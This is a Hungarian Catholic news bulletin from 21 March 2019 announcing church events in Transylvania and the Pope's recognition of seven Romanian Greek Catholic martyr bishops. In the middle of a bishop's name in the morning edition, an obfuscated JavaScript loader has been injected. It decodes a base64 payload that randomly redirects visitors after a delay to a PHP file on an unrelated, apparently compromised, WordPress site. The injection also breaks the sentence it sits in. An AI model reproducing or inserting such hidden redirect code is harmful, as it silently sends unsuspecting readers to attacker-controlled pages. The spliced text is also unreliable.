2019. március 21. – Hírek és programajánló

H Í R E K   D É L B E N

Joannes Kájoni emlékév kezdődik
Kájoni János születésének 390. évfordulója alkalmából emlékév kezdődik, melynek célja fokozottabb figyelmet irányítani Kájoni munkásságára. Az emlékév megnyitó napján, azaz ma délután hat órától a csíksomlyói kegytemplomban szentmisét mutatnak be, amelyen szolgálatot teljesítenek: Bíró János kántor és a Madéfalvi Schola Ványolós András és Ványolós Orsolya vezetésével. A liturgiát zenei műsor követi Szabó András, Hunyadi Koppány, Lázár Zsombor, Ványolós András, Ványolós Orsolya, a Codex együttes és Györfi Erzsébet özreműködésével.

Triduum Kolozsváron
Március 22-24. között Kolozsváron, a Szent Mihály-plébániatemplomban nagyböjti triduum lesz. Az este 6 órakor kezdődő szentmiséken az elmélkedéseket Sajgó Balázs, a Gyulafehérvári Főegyházmegyei Caritas lelki igazgatója tartja.

Belső iránytű Gyergyószentmiklóson
Folytatódik a Belső iránytű előadássorozat Gyergyőszentmiklóson, a Szent István plébánián. Március 22-én, holnap este hét órától Dr. Szabolcs Zoltán szívsebész tart előadást A hit és a hivatás szimbiózisa a szívsebészetben címmel. Minden érdeklődőt várnak.

Ifjúsági lelkinap Sepsiszentgyörgyön
„Mindaz, amit imával hittel kértek, megkapjátok” mottóvalnagyböjti ifjúsági lelkinapot szerveznek a sepsiszentgyörgyi Szent József templomban március 23-án, szombaton. A lelkinap folyamán olyan kérdésekre keresik a választ, mint: Mi az ima?, Kihez, miért és hogyan kell imádkozni? Meghívott előadó Bátor Botond pálos atya lesz. A program reggel 9-16 óra között zajlik. Zenél a K-Egy és a brassói belvárosi templom ifjúsági zenekara. Jelentkezni a 0771-604933 vagy a 0755-808341-es telefonszámokon lehet.

Szülők iskolája Nagyváradon
A nagyváradi Szent László Római Katolikus Líceum szervezésében a Szülők Iskolája meghívott vendége Uzsalyné dr. Pécsi Rita neveléskutató, aki az iskola dísztermében Fejleszt vagy butít …? címmel tart előadást a képernyő és az internet hatásairól, a függőség kialakulásáról és a lehetséges megoldásokról március 23-án, szombaton délelőtt 10 órától. Minden érdeklődőt várnak!

Menet az életért Nagyváradon
A keresztény felekezetek támogatásával március 23-án, szombaton, a házasság, a család és a magzat védelmében újra megszervezik a Menet az életért elnevezésű ökumenikus felvonulást, amely délután három órakor veszi kezdetét a Szent László téren. A menet a sétáló utcán halad végig, megáll a Barátok Temploma előtt, majd az ortodox székesegyház irányába indul tovább, ahol közös imával ér véget.

Családos lelkinap Zimándújfalun
Március 23-án, szombaton a zimándújfalui római katolikus plébánián családos lelkinapot tartanak magyar nyelven. A programban délelőtt 10 órakor Családapostolkodás címmel a nagyváradi Veres család előadása szerepel, azt követően kerekasztal beszélgetésre és kiscsoportos tevékenységre kerül sor. Ebéd után, 14 órakor megosztó kör és kiértékelés, 15:15 órakor családok keresztútja és gyónási alkalom lesz. A találkozó záró szentmiséjét 16 órakor Pál József Csaba megyéspüspök mutatja be. A programok alatt a gyermekekkel külön foglalkozást tartanak. Várnak minden érdeklődőt!

Felújított templomok megáldása
Március 23-án, szombaton a délelőtt tizenegy órakor kezdődő szentmise keretében Böcskei László megyéspüspök megáldja a külsőleg felújított hegyköztótteleki templomot. Másnap, március 24-én a 10 órakor kezdődő szentmise keretében az élesdi belsőleg felújított templomot fogja megáldani a megyéspüspök.
Mindkét helyszínen várják a híveket a közös ünneplésre, hálaadásra.

Előadás a keresztény családoknak Máramarosszigeten
Előadássorozat indul a máramarosszigeti Borromeo Szent Károly plébánián „Keresztény családok, a szórványközösség jövőjének záloga” címmel. A kezdeményezés legfőbb célkitűzése, hogy a plébánián létrejöjjön egy olyan családháló, mely összefogja az egyes családokat egyetlen közösséggé. Az első előadás március 24-én este hét órától lesz a plébánia oratóriumába, meghívott előadó dr. Pécsi Rita neveléskutató, aki Szent József ünnepéhez kapcsolódóan, „apukás előadásával” kifejezetten az édesapákra és az édesapai szerepre összpontosít az Apának lenni nagy lehetőség, szent feladat című előadásában. A szervezők szeretnék a családok egészét megszólítani, ezért az egyes előadások ideje alatt különböző foglalkozásokat szerveznek a gyermekeknek, így biztosítva, a házaspárok nyugodt részvételét. Szeretettel várnak mindenkit.

Időjárás: A fagyos reggelt követően fátyolfelhős-napos, száraz időre van kilátás ma gyenge, helyenként mérsékelt légmozgással. A maximumok 11 és 14 fok között alakulnak.

MRE – Hírszolgálat, 2019. március 21.


H Í R E K   R E G G E L

Ferenc pápa elismerte hét román görögkatolikus püspök vértanúságát
A pápa kedden hagyta jóvá azt a dekrétumot, amelyben elismeri hét román görögkatolikus püspök vértanúságát. Vasile Aftenie bukaresti püspöki helytartó, Ioan Suciu balázsfalvi megbízott püspök, Tit Liviu Chinezu titkos püspök, Valeriu Traian Frențiu nagyváradi, Ioan Balan lugosi, Alexfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andru Rusu máramarosi és Iuliu Hossu kolozsvári püspökök a román kommunista rendszer áldozatai voltak, akiket az akkori hatalom hitük miatt bebörtönzött és megkínzott, a megpróbáltatások következtében életüket vesztették 1950 és 1970 között.
A román görög-katolikus egyház azt reméli, hogy a hét püspök boldoggá avatási szertartása Ferenc pápa jelenlétében történik Balázsfalván, az egyházfő idei romániai látogatása idején – értesít az MTI.

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a máréfalvi templomban tartják az örökös szentségimádási napot. Nagyböjt folyamán járuljunk gyakrabban az Oltáriszentségben jelen levő Krisztus elé, engeszteljük Őt bűneinkért és engedjük, hogy jelenléte formáljon, megtisztítson bennünket.

Könyvbemutató Kolozsváron
A Szent Mihály plébánia Szentegyház u. 4 szám alatti kiállítótermében bemutatják Simon Judit Gyöngyi Az Úr asztalánál című könyvét. A kötetet Kémenes Lóránt főesperes-plébános méltatja. A szerzővel, valamint a könyv illusztrátorával, Kelemen Attilával, Bodó Márta beszélget munkájukról, életükről és a Hifa-Románia Segítség Mindenkinek Egyesületről. Fuvolán közreműködik Illyés Brigitta. Minden érdeklődőt várnak.

Apák ünnepe Nagyváradon
Március 21-én, azaz ma délután hat órai kezdettel a nagyváradi Szent László-templomban szentmisében imádkoznak a jó példát mutató, keresztény életet élő apákért. A szentmise után Uzsalyné dr. Pécsi Rita tart előadást Apának/Atyának lenni nagy lehetőség, szent feladat! címmel, melyben az apaság örömeit, nehézségeit, feladatait, és nélkülözhetetlenségét mutatja be. Az ünneplés este 8 órakor agapéval zárul. Szeretettel várnak minden érdeklődőt.

Orgonaest Váradszőllősön
A Nagyvárad-szöllősi plébániatemplomban ma délután hat órától Bach orgonaestet szerveznek, a híres zeneszerző születésének 334. évfordulóján. Orgonál: Józsa Domokos. Műsoron J. S. Bach művek csendülnek fel. A belépés díjtalan, ám adományokat elfogadnak a szervezők.

Szentségimádás Nagybányán és Temesváron
Nagyböjti elmélyülésre várják a nagybányai híveket csenddel és élő zenével az Oltáriszentség jelenlétében ma este hét órától a Szentháromság templomba.
A temesvár-józsefvárosi Szent Katalin-templomban is szentségimádást tartanak ma este hét órától a fiataloknak.

Menet az életért Nagyváradon
A keresztény felekezetek támogatásával március 23-án, szombaton, a házasság, a család és a magzat védelmében újra megszervezik a Menet az életért elnevezésű ökumenikus felvonulást, amely délután három órakor veszi kezdetét a Szent László téren. A menet a sétáló utcán halad végig, megáll a Barátok Temploma előtt, majd az ortodox székesegyház irányába indul tovább, ahol közös imával ér véget.

Felújított templomok megáldása
Március 23-án, szombaton a délelőtt tizenegy órakor kezdődő szentmise keretében Böcskei László megyéspüspök megáldja a külsőleg felújított hegyköztótteleki templomot. Másnap, március 24-én a 10 órakor kezdődő szentmise keretében az élesdi belsőleg felújított templomot fogja megáldani a megyéspüspök.
Mindkét helyszínen várják a híveket a közös ünneplésre, hálaadásra.

Bevezetés az okoseszközök használatába
A KALOT Egyesület okostelefon- és tabletfelhasználó tanfolyamot indít idősödők számára. A képzés mindazok számára hasznos, akik szeretnének megbarátkozni az okos eszközök – telefon, tablet – használatával, akik betekintést szeretnének nyerni a digitális technológia nyújtotta új kommunikációs, tájékozódási, szórakozási és ügyintézési módokba, lehetőségekbe. A tanfolyam április 1-től kezdődően, 7 héten át tart és heti 6 órás foglalkozást tartalmaz. Érdeklődni és jelentkezni a 0758-840279-es telefonszámon (8-12 óra között), vagy az kepzesek@kalot.ro e-mail címen lehet március 29-ig. A foglalkozásokhoz saját oktostelefon, tablet szükséges. A helyek száma korlátozott!

Időjárás: Ma reggel sokfelé fagyott, a szélcsendes, mélyebben fekvő tájakon -5, -6 fok is előfordult. Később napközben  fátyolfelhős-napos, száraz időre van kilátás gyenge, helyenként mérsékelt légmozgással. A maximumok 11 és 14 fok között alakulnak.

MRE - Hírszolgálat, 2019. március 21.

About the author

maradmin

Leave a Comment